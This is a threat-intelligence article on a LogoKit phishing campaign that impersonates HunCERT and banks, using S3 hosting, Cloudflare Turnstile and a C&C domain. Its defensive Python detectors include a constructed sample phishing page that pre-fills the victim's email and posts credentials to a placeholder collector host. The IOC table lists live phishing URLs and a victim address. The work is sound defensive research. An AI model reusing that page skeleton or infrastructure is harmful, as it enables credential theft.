LogoKit Phishing Attack Leverages Cloudflare Turnstile and Amazon S3 to Boost Effectiveness

A sophisticated phishing campaign leveraging the widely used LogoKit phishing kit has surfaced, targeting a diverse global victim base spanning government, banking, logistics, and other sectors.

Cyble Research and Intelligence Labs (CRIL) uncovered an ongoing operation that impersonates trusted organizations, including Hungary’s Computer Emergency Response Team (HunCERT), by hosting convincing fake login portals on reputable cloud services such as Amazon S3 and Render.

These phishing sites, built for scalability and automation, also embed Cloudflare Turnstile, a bot-detection challenge normally deployed by legitimate sites. On a phishing page it both deters automated scanners and lends the page a veneer of legitimacy, raising the success rate of the credential harvesting operation.

Threat Actors Impersonate Major Entities

Technical analysis of the campaign reveals that phishing websites are carefully engineered to resemble legitimate login pages.

Figure: Phishing page targeting HunCERT

A notable technique is pre-filling the username field with the victim’s real email address, which the phishing link carries in its query string (the ?email= parameter visible in the IOCs below). That detail heightens trust and increases the probability that the victim submits their password.

Sites are hosted directly in Amazon S3 buckets (and on Render), borrowing the trust associated with AWS infrastructure: the hostname belongs to a legitimate provider, which helps the pages slip past reputation-based URL filtering.

A hallmark of this campaign is the integration of Cloudflare Turnstile, a CAPTCHA alternative. Besides keeping automated visitors such as security crawlers and sandboxes from reaching the credential form, the challenge adds a layer of perceived security for the victim.

This meticulous attention to detail is further reflected in the phishing kits’ use of the Clearbit Logo API and Google’s S2 Favicon API.

By dynamically fetching the target organization’s logo and favicon based on the domain of the victim’s email address, LogoKit lets attackers deploy highly targeted, brand-consistent phishing portals at scale.

This automation removes the need for manual preparation of branded assets and facilitates rapid, campaign-wide updates.
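The traits described above (cloud-storage hosting, a victim address in the query string, a Turnstile widget, Clearbit and Google S2 lookups keyed on the email domain, and a form that posts somewhere other than the serving host) can be scored mechanically. The following is an added example written for this article, not code from CRIL or from the LogoKit kit; the sample URL and HTML are constructed to exhibit those traits, collector.example is a placeholder for the attacker's collection host, and the detection threshold is an assumption to be tuned locally.

```python
"""Heuristic check for LogoKit-style traits in a landing page.

Added example, not code from CRIL or from the LogoKit kit. The URL, HTML and
threshold below are constructed for illustration.
"""
import re
from urllib.parse import urlparse, parse_qs

# Hosting patterns seen in the campaign: S3 object URLs and Render apps.
CLOUD_HOST_RE = re.compile(r"\.s3(?:[.-][a-z0-9-]+)?\.amazonaws\.com$|\.onrender\.com$", re.I)
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")
FORM_ACTION_RE = re.compile(r"<form\b[^>]*\baction\s*=\s*[\"']([^\"']+)", re.I)

# Constructed sample page: hosted on S3, victim e-mail in the query string,
# Turnstile widget, Clearbit/S2 lookups keyed on the e-mail domain, and a form
# that posts to a third-party host (collector.example is a placeholder).
SAMPLE_URL = ("https://some-bucket.s3.us-east-2.amazonaws.com/x/he-opas.html"
              "?email=jane.doe@example.org")
SAMPLE_HTML = """
<html><head>
<script src="https://challenges.cloudflare.com/turnstile/v0/api.js" async defer></script>
</head><body>
<img id="logo" src="">
<form method="post" action="https://collector.example/">
  <input id="user" name="username"><input type="password" name="pass">
</form>
<script>
  var email = new URLSearchParams(location.search).get('email');
  var domain = email.split('@')[1];
  document.getElementById('logo').src = 'https://logo.clearbit.com/' + domain;
  var link = document.createElement('link'); link.rel = 'icon';
  link.href = 'https://www.google.com/s2/favicons?domain=' + domain;
  document.head.appendChild(link);
  document.getElementById('user').value = email;
</script>
</body></html>
"""


def extract_prefill_email(url):
    """Return the address carried in the ?email= parameter, or None."""
    values = parse_qs(urlparse(url).query).get("email", [])
    return values[0] if values and EMAIL_RE.match(values[0]) else None


def posts_offsite(url, html):
    """True if any <form> posts to a host other than the one serving the page."""
    page_host = (urlparse(url).hostname or "").lower()
    for action in FORM_ACTION_RE.findall(html):
        action_host = (urlparse(action).hostname or "").lower()
        if action_host and action_host != page_host:
            return True
    return False


def score_page(url, html):
    """Evaluate the page against the traits described in the article; returns
    the per-trait booleans plus a 'score' counting how many are present."""
    host = (urlparse(url).hostname or "").lower()
    traits = {
        "hosted_on_cloud_storage": bool(CLOUD_HOST_RE.search(host)),
        "email_in_query": extract_prefill_email(url) is not None,
        "turnstile_loaded": "challenges.cloudflare.com/turnstile" in html,
        "clearbit_logo_api": "logo.clearbit.com" in html,
        "google_s2_favicon": "google.com/s2/favicons" in html,
        "posts_offsite": posts_offsite(url, html),
    }
    traits["score"] = sum(1 for v in traits.values() if v is True)
    return traits


def is_logokit_like(url, html, threshold=3):
    """Flag a page once at least `threshold` traits co-occur. The threshold is
    an assumption; tune it against your own false-positive rate."""
    return score_page(url, html)["score"] >= threshold


if __name__ == "__main__":
    result = score_page(SAMPLE_URL, SAMPLE_HTML)
    for name, value in result.items():
        print(f"{name:25} {value}")
    print("LogoKit-like:", is_logokit_like(SAMPLE_URL, SAMPLE_HTML))
```

No single trait is conclusive on its own: plenty of legitimate sites load Turnstile, and Clearbit logo lookups are common in SaaS sign-up flows. The value is in the co-occurrence, in particular a form on a storage-bucket hostname that posts credentials to a different domain.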

Convincing Cloud-Hosted Campaigns

The backend of the attack is the malicious domain mettcoint[.]com, which acts as a command-and-control (C&C) hub and receives the harvested credentials.

Figure: Fake error message

CRIL’s investigation found mettcoint[.]com to be an active infrastructure node with open directories and multiple phishing resources targeting both regional and international organizations.

Notably, at the time of analysis no engine on VirusTotal flagged the domain, highlighting its operational stealth and its ability to slip past reputation-based controls.

Further scrutiny revealed that the campaign is not limited to Hungary; other targets include Kina Bank in Papua New Guinea, a major US-based Catholic organization, and logistics firms in Saudi Arabia.

Victims who submit their credentials are typically shown a deceptive error message such as “Error Submitting form. Please try again,” which keeps the victim unaware that the credentials have already been sent to the attacker and delays any report to the security team.

The campaign builds on LogoKit, a phishing kit first documented in 2021 and favored by threat actors for its modular design and easy adaptation to new targets.

Given the sophistication and ongoing nature of the attack, CRIL strongly advises organizations to maintain vigilance through robust security policies and regular awareness training.

CRIL also recommends leveraging threat intelligence feeds, monitoring cloud infrastructure in real time, and pursuing proactive takedowns.

Multi-factor authentication, which makes a harvested password insufficient on its own, combined with regular updates to systems and secure email gateways, can help mitigate the risk posed by this evolving threat.

Indicators of Compromise (IOCs)

Indicator | Type | Description
flyplabtk[.]s3.us-east-2.amazonaws.com/q8T1vRz…/he-opas.html | URL | Phishing URL
hxxps://chyplast[.]onrender.com/clastk-chy.html | URL | Phishing URL
jstplastoss-bk.s3[.]us-east-2.amazonaws.com/z7WvKx…/auth-he-opas.html | URL | Phishing URL
ecowhizz.co[.]za/ecowhizz.co.zaza/he-opas.html?email=ict.apnic@au.saabgroup.com | URL | Phishing URL
mettcoint[.]com | Domain | C&C domain
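To put the indicators above to use, they need to be refanged and matched against traffic, and the ?email= parameter on a hit tells you which user received the link. The following is an added example written for this article, not CRIL’s tooling: the indicator strings are copied from the table (two paths are truncated in the source, so matching is done on hostnames only), the proxy log lines are constructed, and their format (timestamp, client IP, method, URL, status) is an assumption.

```python
"""Refang the published IOCs and match them against proxy logs.

Added example, not CRIL's tooling. The log lines are constructed; their
format (timestamp, client IP, method, URL, status) is an assumption.
"""
import re
from urllib.parse import urlparse, parse_qs

# Indicators as published in the table above, still defanged. Two of the paths
# are truncated in the source, so matching is done on hostnames only.
DEFANGED_IOCS = [
    "flyplabtk[.]s3.us-east-2.amazonaws.com/q8T1vRz…/he-opas.html",
    "hxxps://chyplast[.]onrender.com/clastk-chy.html",
    "jstplastoss-bk.s3[.]us-east-2.amazonaws.com/z7WvKx…/auth-he-opas.html",
    "ecowhizz.co[.]za/ecowhizz.co.zaza/he-opas.html?email=ict.apnic@au.saabgroup.com",
    "mettcoint[.]com",
]

# Constructed proxy log (not real traffic): one user opens a phishing link
# carrying their address, loads Turnstile, then posts to the C&C domain.
SAMPLE_LOG = """\
2025-08-12T09:14:03Z 10.1.2.3 GET https://flyplabtk.s3.us-east-2.amazonaws.com/x/he-opas.html?email=alice@example.org 200
2025-08-12T09:14:05Z 10.1.2.3 GET https://challenges.cloudflare.com/turnstile/v0/api.js 200
2025-08-12T09:14:41Z 10.1.2.3 POST https://mettcoint.com/ 200
2025-08-12T09:20:00Z 10.1.2.9 GET https://www.example.com/ 200
2025-08-12T09:21:10Z 10.1.2.9 GET https://cdn.mettcoint.com/a.js 200
"""

LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d+)$")


def refang(indicator):
    """Undo the usual defanging: [.] -> . and hxxp(s) -> http(s)."""
    return (indicator.replace("[.]", ".")
            .replace("hxxps://", "https://")
            .replace("hxxp://", "http://"))


def ioc_host(indicator):
    """Hostname of a (possibly scheme-less, possibly truncated) indicator."""
    clean = refang(indicator)
    if "://" not in clean:
        clean = "https://" + clean
    return (urlparse(clean).hostname or "").lower()


def host_matches(host, ioc_hosts):
    """Exact match, or a subdomain of an indicator host."""
    return any(host == h or host.endswith("." + h) for h in ioc_hosts)


def scan_log(log_text, ioc_hosts):
    """Return one record per log line whose URL host hits an indicator,
    carrying the victim address if the link embedded one."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parsed = urlparse(m["url"])
        host = (parsed.hostname or "").lower()
        if not host_matches(host, ioc_hosts):
            continue
        email = parse_qs(parsed.query).get("email", [None])[0]
        hits.append({"ts": m["ts"], "src": m["src"], "method": m["method"],
                     "host": host, "email": email})
    return hits


def victims(hits):
    """Set of e-mail addresses that were pre-filled into a phishing link."""
    return {h["email"] for h in hits if h["email"]}


if __name__ == "__main__":
    hosts = {ioc_host(i) for i in DEFANGED_IOCS}
    hits = scan_log(SAMPLE_LOG, hosts)
    for hit in hits:
        print(hit)
    print("victims:", victims(hits))
```

A POST to the C&C domain shortly after a GET of a phishing page from the same client is the sequence to alert on: it means the form was submitted, so the account named in the ?email= parameter should be treated as compromised and its password reset regardless of what the user remembers seeing.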
